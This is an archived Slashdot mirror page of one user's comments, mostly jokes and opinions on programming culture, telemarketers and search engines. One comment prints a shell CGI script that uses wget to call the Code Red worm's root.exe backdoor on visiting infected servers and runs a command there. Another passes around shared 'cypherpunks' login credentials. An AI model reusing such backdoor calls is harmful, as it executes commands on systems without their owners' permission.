Slashdot Mirror


User: marsvin

marsvin's activity in the archive.

Stories
0
Comments
51
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 51

  1. It's not just programmers on Realistic Portrayals of Software Programmers? · · Score: 4, Insightful

    Hollywood doesn't portray anything or anyone accurately, not just programmers, but secret agents, scientists (the most dangerous profession, according to the movies), police officers, psychiatrists, airline pilots, women, and vegetarians as well... even "normal" people are somehow made extra-normal on the screen.

    If you look to films and television for career guidance, chances are you wouldn't make a good programmer anyway.

  2. Re:Thief 3 on Vote for 2002's "Best" Vaporware · · Score: 1

    Plus you know that when it's finished, it's going to be good... how could it not be?

  3. Re:Non-Sun OEM use SPARCcs? on New Tadpole SPARCbook RSN · · Score: 1

    Yep... lots. SPARC is an open standard. Fujitsu and TI make (made?) them, amongst others.

  4. A new cliche for the new millennium on Web Hacking: Attacks and Defense · · Score: 1

    "Never judge a book by its Amazon review"

  5. Re:The obvious question...WHY? on Touchscreen, Chair & Wheel Case Mod · · Score: 3, Funny

    You're objecting to a case mod on the grounds of it being useless? Isn't that the whole point?

    Pointless mods lose points in my book

    Thereby ending up with negative points?

  6. Funny, really on Edsger Wybe Dijkstra: 1930-2002 · · Score: 1

    I've actually only now found out that he went to the same school I did... I went there for seven years, and they never told me that. They only tell you how proud they are about how many stupid politicians and artists were pupils there.

  7. Re:I'm going back to telnet on OpenSSH Local Root Hole · · Score: 1

    A. Consider purchasing SSH from a commercial source because the AMOUNT of problems with it is less


    SSH is complex software; it's bound to always have bugs. OpenSSH just gets audited more. At least this way, *everyone* knows about them, not just the black hats.

  8. Obfuscated code isn't source code anymore on Abusing the GPL? · · Score: 1

    Surely obfuscated code is equivalent to object code: it's only useful to the computer, not to programmers. (In ye olde days, obuscated code was actually used to distribute code that couldn't easily be reverse engineered, but still could be easily used on different platforms.)

    The GPL requires you to make the source code available. Surely distributing obfuscated code is not good enough. You should definitely notify the FSF - if they know, then this won't go unpunished.

  9. Speaking of free registrations on Congress (Still) Looking at whois · · Score: 1

    The NY times, like other similar sites, has a user called 'cipherpunks' with password the same. (Sometimes someone spelled 'cypherpunks' instead, of course.) I suggest everyone uphold this fine tradition (user 'slashdot', maybe?)

  10. Imminent death of Slashdot predicted on Announcing Slashdot Subscriptions · · Score: 1

    Here's an idea: first post tax. Could solve more than one problem at once...

  11. I think I speak for all of us... on Sleep Less, Live Longer · · Score: 4, Funny

    ...when I say that most of us are not often in danger of getting too much sleep ;-)

  12. Re:Egress filtering and ISP responsibility on ISP Forced Out of Business by DoS · · Score: 1

    Sadly, egress filtering does not solve the DoS problem. The problem is that the machines are involved belong to innocent (well, relatively innocent) parties, not that their identity cannot be established.

    Which is not to say that it's a bad idea, of course, and there are no real technical reasons not to implement it, apart from performance considerations.

  13. Re:Getting a taste of his own medicine on Custom OpenBSD 3.0 with IPFilter From Darren Reed · · Score: 1

    Ehm... are we reading the same article?

  14. Re:"a polite reply"? on RMS: Putting an End to Word Attachments · · Score: 2, Funny

    Yes, why can't RMS be more like those polite, well-mannered, superb debaters at slashdot?

    Sheesh...

  15. Re:simple solutions also work on TeleZapper - A Way to Avoid Telemarketers? · · Score: 1

    Interesting... I feel exactly the same way about personal firearms.

  16. Re:simple solutions also work on TeleZapper - A Way to Avoid Telemarketers? · · Score: 1

    Nope... it really is shocking to see someone who is further down the slippery slope than one is oneself. It's not about the money, it's the principle of the thing.

    I *hate* telemarketeers, and I hope I'll never have to accept them as a normal part of life.

  17. Re:simple solutions also work on TeleZapper - A Way to Avoid Telemarketers? · · Score: 1

    Excuse me, but how does my use of the word "bloody" imply that I live in a shitty country that has never been bombed by America?

    Ever wonder how Americans get their repuation for being so cosmopolitan, so mature, and above all such excellent debaters?

  18. Re:simple solutions also work on TeleZapper - A Way to Avoid Telemarketers? · · Score: 1, Flamebait

    Bloody hell... you *pay* to get "only" 5 telemarketing calls in a *month*?

    And Americans wonder why the world thinks they're strange?

  19. Re:But are the search engines independent? on Searching For Google's Successor · · Score: 1

    If there is a Marlboro homepage, then I can't find it either. Try typing 'marlboro' into altavista and see why I prefer Google; the first page (okay, of a small-ish window) is basically ads for cigarette companies.

  20. Re:Yahoo on Searching For Google's Successor · · Score: 1

    Uhm... could this be because they *use* Google?

  21. You could use the hole to _warn_ the sysadmins on Fight Virus With Virus? · · Score: 1

    I've put the following CGI as default.ida on several webservers:


    #!/bin/sh

    echo "Content-type: text/html"
    echo
    echo $REMOTE_ADDR

    /usr/local/bin/wget -q "http://$REMOTE_ADDR/scripts/root.exe?+/c+net+send +127.0.0.1+WARNING!+This+server+has+been+infected+ by+the+Code+Red+worm.+See+http://www.emsolutions.n l/codered/+for+help."


    (Add or remove whitespace to taste)

    We've had something like 80 hits in 3 or 4 days on that page. Mind you, some NT admins can't type the URL in correctly...

  22. AFK? on Jargon File 4.2.0 Out · · Score: 1

    Far be it from me to impugn the accuracy of Slashdot articles, but AFAIK "AFK" has been in there for at least three years...

  23. I knew I've read this before... on CNN Installs Linux · · Score: 1

    Funny (or maybe not), but the tone of this article reminded me a lot of the diary of an AOL user.

  24. Re:Actual Job Posting. on GNU Project Hiring · · Score: 1

    The thought occurs that RMS probably doesn't want to recruit people on slashdot...

  25. Where did Alan come from? on Interview: Ask Alan Cox · · Score: 1

    Didn't you used to write text adventures?